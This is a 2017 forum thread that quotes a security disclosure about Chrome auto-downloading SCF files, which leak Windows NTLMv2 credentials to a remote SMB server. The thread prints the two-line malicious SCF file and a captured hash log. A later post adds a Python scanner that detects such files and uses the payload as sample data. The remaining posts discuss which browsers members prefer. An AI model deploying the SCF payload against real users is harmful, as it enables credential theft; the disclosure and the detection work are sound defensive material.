Windows 7 Forums
Windows 7: Warning: Attackers can Steal Windows Credentials using Google Chrome

17 May 2017   #1
Brink

64-bit Windows 10 Pro
Warning: Attackers can Steal Windows Credentials using Google Chrome

Quote:
Attacks that leak authentication credentials using the SMB file sharing protocol on Windows OS are an ever-present issue, exploited in various ways but usually limited to local area networks. One of the rare pieces of research involving attacks over the internet was recently presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference[1] [2] in 2015. However, there have been no publicly demonstrated SMB-authentication-related attacks on browsers other than Internet Explorer and Edge in the past decade. This paper describes an attack which can lead to Windows credentials theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it.

The Problem

With its default configuration, Chrome browser will automatically download files that it deems safe without prompting the user for a download location but instead using the preset one. From a security standpoint, this feature is not an ideal behavior but any malicious content that slips through still requires a user to manually open/run the file to do any damage. However, what if the downloaded file requires no user interaction to perform malicious actions? Are there file types that can do that?

Windows Explorer Shell Command File or SCF (.scf) is a lesser-known file type going back as far as Windows 98. Most Windows users came across it in Windows 98/ME/NT/2000/XP, where it was primarily used as a Show Desktop shortcut. It is essentially a text file with sections that determine a command to be run (limited to running Explorer and toggling Desktop) and an icon file location. Taken as an example, this is what the contents of the Show Desktop SCF file looked like:

Code:
[Shell]
Command=2
IconFile=explorer.exe,3

[Taskbar]
Command=ToggleDesktop

As with Windows shortcut LNK files, the icon location is automatically resolved when the file is shown in Explorer. Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares. But what is the difference between LNK and SCF from the attack standpoint? Chrome sanitizes LNK files by forcing a .download extension ever since Stuxnet[3] but does not give the same treatment to SCF files.

An SCF file that can be used to trick Windows into an authentication attempt to a remote SMB server contains only two lines, as shown in the following example:

Code:
[Shell]
IconFile=\\170.170.170.170\icon

Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file; Windows File Explorer will automatically try to retrieve the "icon".

The remote SMB server set up by the attacker is ready to capture the victim's username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password. The captured information may look like the following:

Code:
[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000

The above example shows a disclosure of the victim's username, domain and NTLMv2 password hash.

It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings. Therefore, a file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to the inconspicuous nature of attacks using SCF files...


Read more: DefenseCode


18 May 2017   #2
ThrashZone

Win-7-Pro64bit 7-H-Prem-64bit

Hi,
I didn't need a good reason not to install Chrome, but if I did, this might just be it.
18 May 2017   #3
Brink

64-bit Windows 10 Pro

Checking the Ask where to save each file before downloading box is the recommended workaround for now.

Tutorial: Change Download Folder Location in Google Chrome for Windows
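A check to run alongside that workaround, as an added example that is not part of the post or of DefenseCode's paper: a scanner for a download directory that parses the INI-like SCF structure quoted in the first post, flags files whose `[Shell] IconFile` is a UNC path (the icon Explorer resolves as soon as the folder is displayed), and flags the `picture.jpg.scf` naming trick. The sample files are constructed here and written to a temporary directory; the quoted-path variant and the treatment of `//host/` as remote are assumptions, since the post only shows the `\\host\` form.

```python
"""Flag SCF files in a download directory that would trigger an outbound SMB authentication.

Added example, not code from the post or from DefenseCode. Reports .scf files whose
[Shell] IconFile names a UNC host, and .scf files whose name hides a second
extension (Explorer never shows .scf, so picture.jpg.scf displays as picture.jpg).
"""
import re
import tempfile
from pathlib import Path

# \\host\share... or //host/share..., optionally quoted; captures the host.
# Treating the forward-slash form as remote is a conservative assumption.
UNC_RE = re.compile(r'^"?[\\/]{2}([^\\/"]+)')


def parse_scf(text: str) -> dict:
    """Minimal INI parser: {section: {key: value}} with sections and keys lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def remote_icon_host(text: str):
    """Host named by [Shell] IconFile when it is a UNC path, else None."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    match = UNC_RE.match(icon)
    return match.group(1) if match else None


def hides_extension(filename: str) -> bool:
    """True for names like picture.jpg.scf, which Explorer displays as picture.jpg."""
    name = filename.lower()
    return name.endswith(".scf") and "." in name[:-4]


def scan_downloads(directory) -> list:
    """One finding per suspicious .scf file directly inside `directory`."""
    findings = []
    for path in sorted(Path(directory).iterdir()):
        if not path.is_file() or path.suffix.lower() != ".scf":
            continue
        host = remote_icon_host(path.read_text(errors="replace"))
        hidden = hides_extension(path.name)
        if host or hidden:
            findings.append({"file": path.name, "remote_host": host, "hides_extension": hidden})
    return findings


# --- constructed sample directory so the scanner runs offline ---
SAMPLES = {
    # the benign Show Desktop file quoted in the post
    "Show Desktop.scf": "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n",
    # the two-line attack file from the post, under the double-extension name it describes
    "picture.jpg.scf": "[Shell]\r\nIconFile=\\\\170.170.170.170\\icon\r\n",
    # constructed variant: quoted path with an icon index (assumption that Explorer accepts it)
    "invoice.scf": "[Shell]\r\nIconFile=\"\\\\203.0.113.5\\share\\i.ico\",0\r\n",
    # not an SCF file; must be ignored even though it contains a UNC path
    "readme.txt": "IconFile=\\\\203.0.113.5\\x\r\n",
}


def build_sample_dir() -> str:
    directory = tempfile.mkdtemp(prefix="scf-scan-")
    for name, content in SAMPLES.items():
        (Path(directory) / name).write_bytes(content.encode())
    return directory


if __name__ == "__main__":
    for finding in scan_downloads(build_sample_dir()):
        print(finding)
```

Point `scan_downloads` at the real Chrome download folder to audit it; a hit with a non-empty `remote_host` means the folder has already caused, or will cause on next viewing, an SMB authentication attempt to that host.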

18 May 2017   #4
ThrashZone

Win-7-Pro64bit 7-H-Prem-64bit

Hi,
Yep, I would normally do that anyway, but Chrome has Java... and I just do not like it having stuff like that I do not need.
18 May 2017   #5
michael diemer

Windows 7 x64 SP1

I avoid all things Google like I avoid ticks, one of which I just pulled off of me. Gonna be a nasty summer up here in Maine. But back to the subject at hand, Google just reeks of privacy violations. Why anyone would have anything to do with it is beyond me, but then a sucker is born every minute, as they say. (Suckers are nasty too, gotta be careful if you go in the water).
18 May 2017   #6
SCANNERMAN777

Windows 7 Ultimate, Windows 8.1 Pro, Linux Mint/Cinnamon (Triple Boot)

In a single word: CONVENIENCE. This is the argument my wife and I have over GOOGLE. I refuse to use it. She insists on using it for the "convenience". No way is that browser going on my new build. I'd rather use I.E. if it comes down to it. I wouldn't mind seeing BRAVE come to fruition, but until then I'll be content with Firefox. It works well with Linux too.
18 May 2017   #7
tetraps

Windows 7 Professional x64 SP1

Vivaldi is good, too. It is based on Chromium, and all Chrome apps work with it, but the browser itself allows a lot of customization. Made by former Opera devs I think.
19 May 2017   #8
michael diemer

Windows 7 x64 SP1

Quote: Originally Posted by tetraps
Made by former Opera devs I think.
Yes, I think that is right. I forget the details, but I don't believe it was an amicable parting. I like Vivaldi but find that it takes a while to open. After it does it is really fast. And yes you can customize it and make it look pretty.

I continue searching for the perfect browser. I've used Chromium, but it's close enough to Chrome to make me nervous. Firefox always ends up being the default, there's just nothing as robust, safe and stable. It's certainly good enough, and at the top of the list.
19 May 2017   #9
Melchior

Windows 7 Ultimate SP1 x64 (v6.1.7601.23537)

Quote: Originally Posted by SCANNERMAN777
In a single word: CONVENIENCE. This is the argument my wife and I have over GOOGLE. I refuse to use it. She insists on using it for the "convenience". No way is that browser going on my new build. I'd rather use I.E. if it comes down to it. I wouldn't mind seeing BRAVE come to fruition but until then I'll be content with Fire Fox. It works well with Linux too.
Huway! Firefox FOREVER!! lol

I would NOT install Chrome if it was the last browser on the planet

my only problem with Firefox is the Devs are OUT of their MINDS... these days...

they are planning to SCRAP the XUL based extensions system for something they call web extensions which sucks royally

and XUL is what made FF so G.R.E.A.T.

so Firefox's FUTURE is looking pretty bleak now..
and I have been using Firefox since v2.0 wayy wayy back in the day...
21 May 2017   #10
goodlad

windows 7 ultimate x32

I use Chrome daily, only for professional work purposes. I don't download any stuff through Chrome; all the downloads have to go through my FF, no exceptions.

For some reason, other than Chrome, all the other browsers lack the proper customization for my work site. I can't change it either; that's my boss's dev team's work.

FF has always been my go-to-browser since 2005 or 2006. My dad loved to use Netscape Navigator the most back then. My pref was either FF or Opera. I don't like the present lite version of Opera, I still have the old build one of the heavy pack.